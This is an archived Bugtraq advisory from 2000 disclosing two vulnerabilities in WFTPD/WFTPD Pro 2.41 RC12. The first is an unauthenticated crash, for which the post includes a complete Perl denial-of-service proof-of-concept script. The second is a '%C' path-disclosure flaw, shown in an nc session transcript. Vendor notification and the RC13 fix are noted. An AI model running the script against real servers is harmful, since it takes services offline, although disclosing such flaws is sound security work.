[16567] in bugtraq
WFTPD/WFTPD Pro 2.41 RC12 vulnerabilities
daemon@ATHENA.MIT.EDU (Michael)
Tue Sep 5 02:27:18 2000
Mime-Version: 1.0
Content-Type: multipart/mixed;
boundary="----=_NextPart_000_0009_01C0174D.8807B120"
Message-Id: <000c01c016f9$b8192fa0$0101a8c0@michael>
Date: Tue, 5 Sep 2000 15:25:32 +1000
Reply-To: Michael <bluepanda@DWARF.BOX.SK>
From: Michael <bluepanda@DWARF.BOX.SK>
To: BUGTRAQ@SECURITYFOCUS.COM
This is a multi-part message in MIME format.
------=_NextPart_000_0009_01C0174D.8807B120
Content-Type: text/plain;
charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
=================================================================
Blue Panda Vulnerability Announcement: WFTPD/WFTPD Pro 2.41 RC12
05/09/2000 (dd/mm/yyyy)
bluepanda@dwarf.box.sk
http://bluepanda.box.sk/
=================================================================
Multiple vulnerabilities. Details available in attached files.
------=_NextPart_000_0009_01C0174D.8807B120
Content-Type: text/plain;
name="wftpd241-12.txt"
Content-Transfer-Encoding: quoted-printable
Content-Disposition: attachment;
filename="wftpd241-12.txt"
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D
Blue Panda Vulnerability Announcement: WFTPD/WFTPD Pro 2.41 RC12
05/09/2000 (dd/mm/yyyy)
bluepanda@dwarf.box.sk
http://bluepanda.box.sk/
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D
Problem: WFTPD will crash if a large string consisting of characters =
128-255
is received. A valid user/pass combination is not required to take =
advantage
of this flaw.
Vulnerable: WFTPD/WFTPD Pro 2.41 RC12 and prior.
Immune: WFTPD/WFTPD Pro 2.41 RC13.
Vendor status: Notified. A fix has been released.
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D
Proof of concept:
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D
#!/usr/bin/perl
#
# WFTPD/WFTPD Pro 2.41 RC12 denial-of-service
# Blue Panda - bluepanda@dwarf.box.sk
# http://bluepanda.box.sk/
#
# ----------------------------------------------------------
# Disclaimer: this file is intended as proof of concept, and
# is not intended to be used for illegal purposes. I accept
# no responsibility for damage incurred by the use of it.
# ----------------------------------------------------------
#
# Sends WFTPD string consisting of characters > 127, causing it to =
crash.
#
use IO::Socket;
$host =3D "ftp.host.com" ;
$port =3D "21";
$sleepfor =3D 4;
print "Connecting to $host:$port...";
$socket =3D IO::Socket::INET->new(Proto=3D>"tcp", PeerAddr=3D>$host, =
PeerPort=3D>$port) || die "failed.\n";
print "done.\n";
$buffer =3D "\x80" x 2000;
print $socket "$buffer\n";
$counter =3D 0;
print "Sleeping for $sleepfor seconds.";
while($counter < $sleepfor) {
sleep(1);
print ".";
$counter +=3D 1;
}
print "\n";
close($socket);
------=_NextPart_000_0009_01C0174D.8807B120
Content-Type: text/plain;
name="wftpd241-12-2.txt"
Content-Transfer-Encoding: quoted-printable
Content-Disposition: attachment;
filename="wftpd241-12-2.txt"
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D
BluePanda Vulnerability Announcement: WFTPD/WFTPD Pro 2.41 RC12
05/09/2000 (dd/mm/yyyy)
bluepanda@dwarf.box.sk
http://bluepanda.box.sk/
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D
Problem: "Magic cookie" %C devulges sensitive information.
Vulnerable: WFTPD/WFTPD Pro 2.41 RC12, and prior.
Immune: WFTPD/WFTPD Pro 2.41 RC13.
Vendor status: Notified. A fix has been released.
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D
Details:
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D
Use of the "magic cookie" %C reveals the full path of the current =
directory,
ie:
C:\>nc panda 21
220 WFTPD 2.4 service (by Texas Imperial Software) ready for new user
user anonymous
331-Anonymous user access allowed - please enter your email
331-address as the password:
331 Give me your password, please
pass
230 Logged in successfully
%C
500 Unidentified command D:\FTPROOT\
------=_NextPart_000_0009_01C0174D.8807B120--
